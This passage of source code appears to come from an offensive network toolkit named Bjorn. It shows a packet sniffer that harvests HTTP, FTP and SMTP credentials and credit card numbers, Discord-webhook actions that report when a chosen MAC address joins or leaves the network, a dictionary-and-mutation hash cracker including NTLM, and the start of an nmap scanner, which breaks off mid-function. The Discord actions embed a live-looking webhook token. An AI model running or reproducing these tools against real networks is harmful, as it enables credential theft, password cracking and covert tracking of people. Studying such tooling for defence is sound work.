                self.statistics['total_packets'] += 1
                if hasattr(packet, 'highest_layer'):
                    self.statistics[packet.highest_layer] += 1
            if hasattr(packet, 'tcp'):
                self.analyze_tcp_packet(packet)
        except Exception as e:
            logging.error(f"Error processing packet: {e}")

    def analyze_tcp_packet(self, packet):
        try:
            if hasattr(packet, 'http'):
                self.analyze_http_packet(packet)
            elif hasattr(packet, 'ftp'):
                self.analyze_ftp_packet(packet)
            elif hasattr(packet, 'smtp'):
                self.analyze_smtp_packet(packet)
            if hasattr(packet.tcp, 'payload'):
                self.analyze_payload(packet.tcp.payload)
        except Exception as e:
            logging.error(f"Error analyzing TCP packet: {e}")

    def analyze_http_packet(self, packet):
        try:
            if hasattr(packet.http, 'request_uri'):
                for field in ['username', 'password']:
                    for pattern in CREDENTIAL_PATTERNS['http'][field]:
                        matches = re.findall(pattern, packet.http.request_uri)
                        if matches:
                            with self.lock:
                                self.credentials.append({
                                    'protocol': 'HTTP',
                                    'type': field,
                                    'value': matches[0],
                                    'timestamp': datetime.now().isoformat(),
                                    'source': packet.ip.src if hasattr(packet, 'ip') else None
                                })
        except Exception as e:
            logging.error(f"Error analyzing HTTP packet: {e}")

    def analyze_ftp_packet(self, packet):
        try:
            if hasattr(packet.ftp, 'request_command'):
                cmd = packet.ftp.request_command.upper()
                if cmd in ['USER', 'PASS']:
                    with self.lock:
                        self.credentials.append({
                            'protocol': 'FTP',
                            'type': 'username' if cmd == 'USER' else 'password',
                            'value': packet.ftp.request_arg,
                            'timestamp': datetime.now().isoformat(),
                            'source': packet.ip.src if hasattr(packet, 'ip') else None
                        })
        except Exception as e:
            logging.error(f"Error analyzing FTP packet: {e}")

    def analyze_smtp_packet(self, packet):
        try:
            if hasattr(packet.smtp, 'command_line'):
                for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
                    matches = re.findall(pattern, packet.smtp.command_line)
                    if matches:
                        with self.lock:
                            self.credentials.append({
                                'protocol': 'SMTP',
                                'type': 'auth',
                                'value': matches[0],
                                'timestamp': datetime.now().isoformat(),
                                'source': packet.ip.src if hasattr(packet, 'ip') else None
                            })
        except Exception as e:
            logging.error(f"Error analyzing SMTP packet: {e}")

    def analyze_payload(self, payload):
        patterns = {
            'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
            'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b',
            'ip_address': r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
        }
        for name, pattern in patterns.items():
            matches = re.findall(pattern, payload)
            if matches:
                with self.lock:
                    self.interesting_patterns.append({
                        'type': name,
                        'value': matches[0],
                        'timestamp': datetime.now().isoformat()
                    })

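    # --- Illustrative sketch (editor's example, not part of the original action) ---
    # The same regexes as analyze_payload(), run against a hypothetical payload
    # string. Defined for reference only; nothing in the class calls it.
    def _demo_payload_patterns(self):
        sample = "contact admin@example.com from 192.168.1.10"  # hypothetical data
        email_re = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
        ip_re = r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
        # -> (['admin@example.com'], ['192.168.1.10'])
        return re.findall(email_re, sample), re.findall(ip_re, sample)
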
    def save_results(self):
        try:
            os.makedirs(self.output_dir, exist_ok=True)
            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
            stats_file = os.path.join(self.output_dir, f"capture_stats_{timestamp}.json")
            with open(stats_file, 'w') as f:
                json.dump(dict(self.statistics), f, indent=4)
            if self.credentials:
                creds_file = os.path.join(self.output_dir, f"credentials_{timestamp}.json")
                with open(creds_file, 'w') as f:
                    json.dump(self.credentials, f, indent=4)
            if self.interesting_patterns:
                patterns_file = os.path.join(self.output_dir, f"patterns_{timestamp}.json")
                with open(patterns_file, 'w') as f:
                    json.dump(self.interesting_patterns, f, indent=4)
            logging.info(f"Results saved to {self.output_dir}")
        except Exception as e:
            logging.error(f"Failed to save results: {e}")

    def execute(self):
        try:
            # Timeout thread (unchanged) ...
            if self.timeout and self.timeout > 0:
                def _stop_after():
                    self.stop_capture.wait(self.timeout)
                    self.stop_capture.set()
                threading.Thread(target=_stop_after, daemon=True).start()

            logging.info(...)

            self.capture = pyshark.LiveCapture(interface=self.interface, bpf_filter=self.capture_filter)

            # Soft interrupt -- SKIP when running embedded via importlib (in a thread)
            if os.environ.get("BJORN_EMBEDDED") != "1":
                try:
                    signal.signal(signal.SIGINT, self.handle_interrupt)
                    signal.signal(signal.SIGTERM, self.handle_interrupt)
                except Exception:
                    # e.g. ValueError when not running in the main thread
                    pass

            for packet in self.capture.sniff_continuously():
                if self.stop_capture.is_set() or self.statistics['total_packets'] >= self.max_packets:
                    break
                self.process_packet(packet)
        except Exception as e:
            logging.error(f"Capture error: {e}")
        finally:
            self.cleanup()
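
    # --- Illustrative sketch (editor's example, not part of the original action) ---
    # Why the BJORN_EMBEDDED guard exists: signal.signal() raises ValueError when
    # called outside the main thread, which is how embedded actions run. A
    # standalone safe wrapper would look like this (never called here):
    def _demo_safe_signal(self, handler):
        import signal as _signal
        import threading as _threading
        if _threading.current_thread() is _threading.main_thread():
            _signal.signal(_signal.SIGINT, handler)
            return True
        return False  # embedded/thread mode: rely on stop_capture instead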

    def handle_interrupt(self, signum, frame):
        self.stop_capture.set()

    def cleanup(self):
        if self.capture:
            self.capture.close()
        self.save_results()
        logging.info("Capture completed")


def save_settings(interface, capture_filter, output_dir, timeout, max_packets):
    try:
        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
        settings = {
            "interface": interface,
            "capture_filter": capture_filter,
            "output_dir": output_dir,
            "timeout": timeout,
            "max_packets": max_packets
        }
        with open(SETTINGS_FILE, 'w') as f:
            json.dump(settings, f)
        logging.info(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        logging.error(f"Failed to save settings: {e}")


def load_settings():
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}

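# --- Illustrative sketch (editor's example, not part of the original action) ---
# The save_settings()/load_settings() pair gives a simple round-trip: values
# written once become defaults on the next run. A minimal check, assuming
# SETTINGS_FILE is writable (never called by the action itself):
def _demo_settings_roundtrip():
    save_settings("wlan0", DEFAULT_FILTER, DEFAULT_OUTPUT_DIR, 300, 10000)
    loaded = load_settings()
    return loaded.get("interface") == "wlan0"
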
def main():
    parser = argparse.ArgumentParser(description="OdinEye: network traffic analyzer & credential hunter")
    parser.add_argument("-i", "--interface", required=False, help="Network interface to monitor")
    parser.add_argument("-f", "--filter", default=DEFAULT_FILTER, help="BPF capture filter")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
    parser.add_argument("-t", "--timeout", type=int, default=300, help="Capture timeout in seconds")
    parser.add_argument("-m", "--max-packets", type=int, default=10000, help="Maximum packets to capture")
    args = parser.parse_args()

    settings = load_settings()
    interface = args.interface or settings.get("interface")
    capture_filter = args.filter or settings.get("capture_filter", DEFAULT_FILTER)
    output_dir = args.output or settings.get("output_dir", DEFAULT_OUTPUT_DIR)
    timeout = args.timeout or settings.get("timeout", 300)
    max_packets = args.max_packets or settings.get("max_packets", 10000)

    if not interface:
        logging.error("Interface is required. Use -i or set it in settings")
        return

    save_settings(interface, capture_filter, output_dir, timeout, max_packets)
    analyzer = OdinEye(interface, capture_filter, output_dir, timeout, max_packets)
    analyzer.execute()


if __name__ == "__main__":
    main()


"""
# action_template.py
# Example template for a Bjorn action with Neo launcher support

# UI Metadata
b_class = "MyAction"
b_module = "my_action"
b_enabled = 1
b_action = "normal"  # normal, aggressive, stealth
b_description = "Description of what this action does"

# Arguments schema for UI
b_args = {
    "target": {
        "type": "text",
        "label": "Target IP/Host",
        "default": "192.168.1.1",
        "placeholder": "Enter target",
        "help": "The target to scan"
    },
    "port": {
        "type": "number",
        "label": "Port",
        "default": 80,
        "min": 1,
        "max": 65535
    },
    "protocol": {
        "type": "select",
        "label": "Protocol",
        "choices": ["tcp", "udp"],
        "default": "tcp"
    },
    "verbose": {
        "type": "checkbox",
        "label": "Verbose output",
        "default": False
    },
    "timeout": {
        "type": "slider",
        "label": "Timeout (seconds)",
        "min": 10,
        "max": 300,
        "step": 10,
        "default": 60
    }
}

def compute_dynamic_b_args(base: dict) -> dict:
    # Compute dynamic values at runtime
    return base

import argparse
import sys

def main():
    parser = argparse.ArgumentParser(description=b_description)
    parser.add_argument('--target', default=b_args['target']['default'])
    parser.add_argument('--port', type=int, default=b_args['port']['default'])
    parser.add_argument('--protocol', choices=b_args['protocol']['choices'],
                        default=b_args['protocol']['default'])
    parser.add_argument('--verbose', action='store_true')
    parser.add_argument('--timeout', type=int, default=b_args['timeout']['default'])

    args = parser.parse_args()

    # Your action logic here
    print(f"Starting action with target: {args.target}")
    # ...

if __name__ == "__main__":
    main()
"""
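
# --- Illustrative sketch (editor's example, not part of the original template) ---
# The template above maps each b_args entry to argparse by hand. A generic
# mapping could be derived from the schema itself; this is a sketch under the
# assumption that only the field types shown in the template exist.
def _demo_args_from_schema(schema):
    import argparse
    parser = argparse.ArgumentParser()
    for name, spec in schema.items():
        if spec.get("type") == "checkbox":
            parser.add_argument(f"--{name}", action="store_true")
        elif spec.get("type") in ("number", "slider"):
            parser.add_argument(f"--{name}", type=int, default=spec.get("default"))
        elif spec.get("type") == "select":
            parser.add_argument(f"--{name}", choices=spec.get("choices"),
                                default=spec.get("default"))
        else:
            parser.add_argument(f"--{name}", default=spec.get("default"))
    return parser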
82
resources/default_config/actions/presence_join.py
Normal file
@@ -0,0 +1,82 @@
# actions/presence_join.py
# -*- coding: utf-8 -*-
"""
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""

import requests
from typing import Optional
import logging
from datetime import datetime, timezone
from logger import Logger
from shared import SharedData  # only if executed directly for testing

logger = Logger(name="PresenceJoin", level=logging.DEBUG)

# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceJoin"
b_module = "presence_join"
b_status = "PresenceJoin"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0  # not needed: on_join only fires on join transition
b_rate_limit = None
b_trigger = "on_join"  # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any": [{"mac_is": "60:57:c8:51:63:fb"}]}  # adapt as needed

# Replace with your webhook
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"


class PresenceJoin:
    def __init__(self, shared_data):
        self.shared_data = shared_data

    def _send(self, text: str) -> None:
        if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
            logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
            return
        try:
            r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
            if r.status_code < 300:
                logger.info("PresenceJoin: webhook sent.")
            else:
                logger.error(f"PresenceJoin: HTTP {r.status_code}: {r.text}")
        except Exception as e:
            logger.error(f"PresenceJoin: webhook error: {e}")

    def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
        """
        Called by the orchestrator when the scheduler detected the join.
        ip/port = host targets (if known), row = host info.
        """
        try:
            mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
            # Parenthesized so a missing 'hostnames' key cannot mask a present 'hostname'.
            host = row.get("hostname") or ((row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None)
            name = f"{host} ({mac})" if host else mac
            ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()

            # Add timestamp in UTC
            timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")

            msg = "✅ **Presence detected**\n"
            msg += f"- Host: {host or 'unknown'}\n"
            msg += f"- MAC: {mac}\n"
            if ip_s:
                msg += f"- IP: {ip_s}\n"
            msg += f"- Time: {timestamp}"

            self._send(msg)
            return "success"
        except Exception as e:
            logger.error(f"PresenceJoin error: {e}")
            return "failed"


if __name__ == "__main__":
    sd = SharedData()
    logger.info("PresenceJoin ready (direct mode).")
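
# --- Illustrative sketch (editor's example, not part of the original action) ---
# _send() posts a plain-text "content" payload. Discord webhooks also accept an
# "embeds" array; a richer notification could look like this (hypothetical
# fields, never called by the action):
def _demo_send_embed(url, host, mac, ip):
    payload = {
        "embeds": [{
            "title": "Presence detected",
            "fields": [
                {"name": "Host", "value": host or "unknown"},
                {"name": "MAC", "value": mac},
                {"name": "IP", "value": ip or "-"},
            ],
        }]
    }
    return requests.post(url, json=payload, timeout=6)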
81
resources/default_config/actions/presence_left.py
Normal file
@@ -0,0 +1,81 @@
# actions/presence_left.py
# -*- coding: utf-8 -*-
"""
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""

import requests
from typing import Optional
import logging
from datetime import datetime, timezone
from logger import Logger
from shared import SharedData  # only if executed directly for testing

logger = Logger(name="PresenceLeave", level=logging.DEBUG)

# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceLeave"
b_module = "presence_left"
b_status = "PresenceLeave"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0  # not needed: on_leave only fires on leave transition
b_rate_limit = None
b_trigger = "on_leave"  # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any": [{"mac_is": "60:57:c8:51:63:fb"}]}  # adapt as needed

# Replace with your webhook (can reuse the same as PresenceJoin)
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"


class PresenceLeave:
    def __init__(self, shared_data):
        self.shared_data = shared_data

    def _send(self, text: str) -> None:
        if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
            logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
            return
        try:
            r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
            if r.status_code < 300:
                logger.info("PresenceLeave: webhook sent.")
            else:
                logger.error(f"PresenceLeave: HTTP {r.status_code}: {r.text}")
        except Exception as e:
            logger.error(f"PresenceLeave: webhook error: {e}")

    def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
        """
        Called by the orchestrator when the scheduler detected the disconnection.
        ip/port = last known target (if available), row = host info.
        """
        try:
            mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
            # Parenthesized so a missing 'hostnames' key cannot mask a present 'hostname'.
            host = row.get("hostname") or ((row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None)
            ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()

            # Add timestamp in UTC
            timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")

            msg = "❌ **Presence lost**\n"
            msg += f"- Host: {host or 'unknown'}\n"
            msg += f"- MAC: {mac}\n"
            if ip_s:
                msg += f"- Last IP: {ip_s}\n"
            msg += f"- Time: {timestamp}"

            self._send(msg)
            return "success"
        except Exception as e:
            logger.error(f"PresenceLeave error: {e}")
            return "failed"


if __name__ == "__main__":
    sd = SharedData()
    logger.info("PresenceLeave ready (direct mode).")
265
resources/default_config/actions/rune_cracker.py
Normal file
@@ -0,0 +1,265 @@
# Advanced password cracker supporting multiple hash formats and attack methods.
# Saves settings in `/home/bjorn/.settings_bjorn/rune_cracker_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input     Input file containing hashes to crack.
# -w, --wordlist  Path to password wordlist (default: built-in list).
# -r, --rules     Path to rules file for mutations (default: built-in rules).
# -t, --type      Hash type (md5, sha1, sha256, sha512, ntlm).
# -o, --output    Output directory (default: /home/bjorn/Bjorn/data/output/hashes).

import os
import json
import hashlib
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
import itertools
import re


b_class = "RuneCracker"
b_module = "rune_cracker"
b_enabled = 0

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/hashes"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "rune_cracker_settings.json")

# Supported hash types and their patterns.
# Note: md5 and ntlm share the same 32-hex-digit pattern, so auto-detection
# cannot tell them apart; pass -t/--type to disambiguate.
HASH_PATTERNS = {
    'md5': r'^[a-fA-F0-9]{32}$',
    'sha1': r'^[a-fA-F0-9]{40}$',
    'sha256': r'^[a-fA-F0-9]{64}$',
    'sha512': r'^[a-fA-F0-9]{128}$',
    'ntlm': r'^[a-fA-F0-9]{32}$'
}

class RuneCracker:
    def __init__(self, input_file, wordlist=None, rules=None, hash_type=None, output_dir=DEFAULT_OUTPUT_DIR):
        self.input_file = input_file
        self.wordlist = wordlist
        self.rules = rules
        self.hash_type = hash_type
        self.output_dir = output_dir

        self.hashes = set()
        self.cracked = {}
        self.lock = threading.Lock()

        # Load mutation rules
        self.mutation_rules = self.load_rules()

    def load_hashes(self):
        """Load hashes from input file and validate format."""
        try:
            with open(self.input_file, 'r') as f:
                for line in f:
                    hash_value = line.strip()
                    if self.hash_type:
                        if re.match(HASH_PATTERNS[self.hash_type], hash_value):
                            self.hashes.add(hash_value)
                    else:
                        # Try to auto-detect hash type
                        for h_type, pattern in HASH_PATTERNS.items():
                            if re.match(pattern, hash_value):
                                self.hashes.add(hash_value)
                                break

            logging.info(f"Loaded {len(self.hashes)} valid hashes")

        except Exception as e:
            logging.error(f"Error loading hashes: {e}")

    def load_wordlist(self):
        """Load password wordlist."""
        if self.wordlist and os.path.exists(self.wordlist):
            with open(self.wordlist, 'r', errors='ignore') as f:
                return [line.strip() for line in f if line.strip()]
        return ['password', 'admin', '123456', 'qwerty', 'letmein']

    def load_rules(self):
        """Load mutation rules."""
        if self.rules and os.path.exists(self.rules):
            with open(self.rules, 'r') as f:
                return [line.strip() for line in f if line.strip() and not line.startswith('#')]
        return [
            'capitalize',
            'lowercase',
            'uppercase',
            'l33t',
            'append_numbers',
            'prepend_numbers',
            'toggle_case'
        ]

    def apply_mutations(self, word):
        """Apply various mutation rules to a word."""
        mutations = set([word])

        for rule in self.mutation_rules:
            if rule == 'capitalize':
                mutations.add(word.capitalize())
            elif rule == 'lowercase':
                mutations.add(word.lower())
            elif rule == 'uppercase':
                mutations.add(word.upper())
            elif rule == 'l33t':
                mutations.add(word.replace('a', '@').replace('e', '3').replace('i', '1')
                              .replace('o', '0').replace('s', '5'))
            elif rule == 'append_numbers':
                mutations.update(word + str(n) for n in range(100))
            elif rule == 'prepend_numbers':
                mutations.update(str(n) + word for n in range(100))
            elif rule == 'toggle_case':
                mutations.add(''.join(c.upper() if i % 2 else c.lower()
                                      for i, c in enumerate(word)))

        return mutations

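    # --- Illustrative sketch (editor's example, not part of the original action) ---
    # What apply_mutations() produces for a short word with the default rules:
    # case variants, an 'l33t' rewrite, and 200 numeric variants. Reference only.
    def _demo_mutations(self):
        muts = self.apply_mutations("pass")
        # Contains e.g. 'Pass', 'PASS', 'p@55', 'pass7', '42pass', 'pAsS'
        return len(muts)
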
    def hash_password(self, password, hash_type):
        """Generate hash for a password using specified algorithm."""
        if hash_type == 'md5':
            return hashlib.md5(password.encode()).hexdigest()
        elif hash_type == 'sha1':
            return hashlib.sha1(password.encode()).hexdigest()
        elif hash_type == 'sha256':
            return hashlib.sha256(password.encode()).hexdigest()
        elif hash_type == 'sha512':
            return hashlib.sha512(password.encode()).hexdigest()
        elif hash_type == 'ntlm':
            # NTLM = MD4 over the UTF-16LE password; note that 'md4' may be
            # unavailable on OpenSSL 3.x builds unless the legacy provider is enabled.
            return hashlib.new('md4', password.encode('utf-16le')).hexdigest()

        return None

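    # --- Illustrative sketch (editor's example, not part of the original action) ---
    # hash_password() on a known value, for sanity-checking the cracker. The MD5
    # digest of 'password' is a well-known constant. Reference only, never called.
    def _demo_hash(self):
        digest = self.hash_password("password", "md5")
        return digest == "5f4dcc3b5aa765d61d8327deb882cf99"
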
    def crack_password(self, password):
        """Attempt to crack hashes using a single password and its mutations."""
        try:
            mutations = self.apply_mutations(password)

            for mutation in mutations:
                for hash_type in HASH_PATTERNS.keys():
                    if not self.hash_type or self.hash_type == hash_type:
                        hash_value = self.hash_password(mutation, hash_type)

                        if hash_value in self.hashes:
                            with self.lock:
                                self.cracked[hash_value] = {
                                    'password': mutation,
                                    'hash_type': hash_type,
                                    'timestamp': datetime.now().isoformat()
                                }
                            logging.info(f"Cracked hash: {hash_value[:8]}... = {mutation}")

        except Exception as e:
            logging.error(f"Error cracking with password {password}: {e}")

    def save_results(self):
        """Save cracked passwords to JSON file."""
        try:
            os.makedirs(self.output_dir, exist_ok=True)
            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")

            results = {
                'timestamp': datetime.now().isoformat(),
                'total_hashes': len(self.hashes),
                'cracked_count': len(self.cracked),
                'cracked_hashes': self.cracked
            }

            output_file = os.path.join(self.output_dir, f"cracked_{timestamp}.json")
            with open(output_file, 'w') as f:
                json.dump(results, f, indent=4)

            logging.info(f"Results saved to {output_file}")

        except Exception as e:
            logging.error(f"Failed to save results: {e}")

    def execute(self):
        """Execute the password cracking process."""
        try:
            logging.info("Starting password cracking process")
            self.load_hashes()

            if not self.hashes:
                logging.error("No valid hashes loaded")
                return

            wordlist = self.load_wordlist()

            with ThreadPoolExecutor(max_workers=10) as executor:
                executor.map(self.crack_password, wordlist)

            self.save_results()

            logging.info(f"Cracking completed. Cracked {len(self.cracked)}/{len(self.hashes)} hashes")

        except Exception as e:
            logging.error(f"Error during execution: {e}")


def save_settings(input_file, wordlist, rules, hash_type, output_dir):
    """Save settings to JSON file."""
    try:
        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
        settings = {
            "input_file": input_file,
            "wordlist": wordlist,
            "rules": rules,
            "hash_type": hash_type,
            "output_dir": output_dir
        }
        with open(SETTINGS_FILE, 'w') as f:
            json.dump(settings, f)
        logging.info(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        logging.error(f"Failed to save settings: {e}")


def load_settings():
    """Load settings from JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}


def main():
    parser = argparse.ArgumentParser(description="Advanced password cracker")
    parser.add_argument("-i", "--input", help="Input file containing hashes")
    parser.add_argument("-w", "--wordlist", help="Path to password wordlist")
    parser.add_argument("-r", "--rules", help="Path to rules file")
    parser.add_argument("-t", "--type", choices=list(HASH_PATTERNS.keys()), help="Hash type")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
    args = parser.parse_args()

    settings = load_settings()
    input_file = args.input or settings.get("input_file")
    wordlist = args.wordlist or settings.get("wordlist")
    rules = args.rules or settings.get("rules")
    hash_type = args.type or settings.get("hash_type")
    output_dir = args.output or settings.get("output_dir")

    if not input_file:
        logging.error("Input file is required. Use -i or save it in settings")
        return

    save_settings(input_file, wordlist, rules, hash_type, output_dir)

    cracker = RuneCracker(
        input_file=input_file,
        wordlist=wordlist,
        rules=rules,
        hash_type=hash_type,
        output_dir=output_dir
    )
    cracker.execute()


if __name__ == "__main__":
    main()
708
resources/default_config/actions/scanning.py
Normal file
@@ -0,0 +1,708 @@
# scanning.py – Network scanner (DB-first, no stubs)
# - Host discovery (nmap -sn -PR)
# - Resolve MAC/hostname (per-host threads) -> DB (hosts table)
# - Port scan (multi-threads) -> DB (merge ports by MAC)
# - Mark alive=0 for hosts not seen this run
# - Update stats (stats table)
# - Light logging (milestones) without flooding
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
# - NEW: No DB insert without a real MAC. Unresolved IPs are kept in-memory for this run.

import os
import threading
import socket
import time
import logging
import subprocess
from datetime import datetime

import netifaces
from getmac import get_mac_address as gma
import ipaddress
import nmap

from logger import Logger

logger = Logger(name="scanning.py", level=logging.DEBUG)

b_class = "NetworkScanner"
b_module = "scanning"
b_status = "NetworkScanner"
b_port = None
b_parent = None
b_priority = 1
b_action = "global"
b_trigger = "on_interval:180"
b_requires = '{"max_concurrent": 1}'


class NetworkScanner:
    """
    Network scanner that populates SQLite (hosts + stats). No CSV/JSON.
    Keeps the original fast logic: nmap discovery, per-host threads, per-port threads.
    NEW: no 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory.
    """
    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.logger = logger
        self.blacklistcheck = shared_data.blacklistcheck
        self.mac_scan_blacklist = set(shared_data.mac_scan_blacklist or [])
        self.ip_scan_blacklist = set(shared_data.ip_scan_blacklist or [])
        self.hostname_scan_blacklist = set(shared_data.hostname_scan_blacklist or [])
        self.lock = threading.Lock()
        self.nm = nmap.PortScanner()
        self.running = False
        self.scan_interface = None

        # progress
        self.total_hosts = 0
        self.scanned_hosts = 0
        self.total_ports = 0
        self.scanned_ports = 0

    # ---------- progress ----------
    def update_progress(self, phase, increment=1):
        with self.lock:
            if phase == 'host':
                self.scanned_hosts += increment
                host_part = (self.scanned_hosts / self.total_hosts) * 50 if self.total_hosts else 0
                total = host_part
            elif phase == 'port':
                self.scanned_ports += increment
                port_part = (self.scanned_ports / self.total_ports) * 50 if self.total_ports else 0
                total = 50 + port_part
            else:
                total = 0
            total = min(max(total, 0), 100)
            self.shared_data.bjorn_progress = f"{int(total)}%"

    # ---------- network ----------
    def get_network(self):
        if self.shared_data.orchestrator_should_exit:
            return None
        try:
            if self.shared_data.use_custom_network:
                net = ipaddress.ip_network(self.shared_data.custom_network, strict=False)
                self.logger.info(f"Using custom network: {net}")
                return net

            interface = self.shared_data.default_network_interface
            if interface.startswith('bnep'):
                for alt in ['wlan0', 'eth0']:
                    if alt in netifaces.interfaces():
                        interface = alt
                        self.logger.info(f"Switching from bnep* to {interface}")
                        break

            addrs = netifaces.ifaddresses(interface)
            ip_info = addrs.get(netifaces.AF_INET)
            if not ip_info:
                self.logger.error(f"No IPv4 address found for interface {interface}.")
                return None

            ip_address = ip_info[0]['addr']
            netmask = ip_info[0]['netmask']
            network = ipaddress.IPv4Network(f"{ip_address}/{netmask}", strict=False)
            self.scan_interface = interface
            self.logger.info(f"Using network: {network} via {interface}")
            return network
        except Exception as e:
            self.logger.error(f"Error in get_network: {e}")
            return None

    # ---------- vendor / essid ----------
    def load_mac_vendor_map(self):
        vendor_map = {}
        path = self.shared_data.nmap_prefixes_file
        if not path or not os.path.exists(path):
            self.logger.debug(f"nmap_prefixes not found at {path}")
            return vendor_map
        try:
            with open(path, 'r') as f:
                for line in f:
                    line = line.strip()
                    if not line or line.startswith('#'):
                        continue
                    parts = line.split(None, 1)
                    if len(parts) == 2:
                        pref, vend = parts
                        vendor_map[pref.strip().upper()] = vend.strip()
        except Exception as e:
            self.logger.error(f"load_mac_vendor_map error: {e}")
        return vendor_map

    def mac_to_vendor(self, mac, vendor_map):
        if not mac or len(mac.split(':')) < 3:
            return ""
        pref = ''.join(mac.split(':')[:3]).upper()
        return vendor_map.get(pref, "")

    def get_current_essid(self):
        try:
            essid = subprocess.check_output(['iwgetid', '-r'], stderr=subprocess.STDOUT, universal_newlines=True).strip()
            return essid or ""
        except Exception:
            return ""

    # ---------- hostname / mac ----------
    def validate_hostname(self, ip, hostname):
        if not hostname:
            return ""
        try:
            infos = socket.getaddrinfo(hostname, None, family=socket.AF_INET)
            ips = {ai[4][0] for ai in infos}
            return hostname if ip in ips else ""
        except Exception:
            return ""

    def get_mac_address(self, ip, hostname):
        """
        Try multiple strategies to resolve a real MAC for the given IP.
        RETURNS: normalized MAC like 'aa:bb:cc:dd:ee:ff' or None.
        NEVER returns 'IP:<ip>'.
        """
        if self.shared_data.orchestrator_should_exit:
            return None

        import re

        MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
        BAD_MACS = {"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"}

        def _normalize_mac(s: str | None) -> str | None:
            if not s:
                return None
            m = MAC_RE.search(s)
            if not m:
                return None
            return m.group(0).replace('-', ':').lower()

        def _is_bad_mac(mac: str | None) -> bool:
            if not mac:
                return True
            mac_l = mac.lower()
            if mac_l in BAD_MACS:
                return True
            parts = mac_l.split(':')
            if len(parts) == 6 and len(set(parts)) == 1:
                return True
            return False

        try:
            mac = None

            # 1) getmac (retry a few times)
            retries = 6
            while not mac and retries > 0 and not self.shared_data.orchestrator_should_exit:
                try:
                    from getmac import get_mac_address as gma
                    mac = _normalize_mac(gma(ip=ip))
                except Exception:
                    mac = None
                if not mac:
                    time.sleep(1.5)
                    retries -= 1

            # 2) targeted arp-scan
            if not mac:
                try:
                    iface = self.scan_interface or self.shared_data.default_network_interface or "wlan0"
                    out = subprocess.check_output(
                        ['sudo', 'arp-scan', '--interface', iface, '-q', ip],
                        universal_newlines=True, stderr=subprocess.STDOUT
                    )
                    for line in out.splitlines():
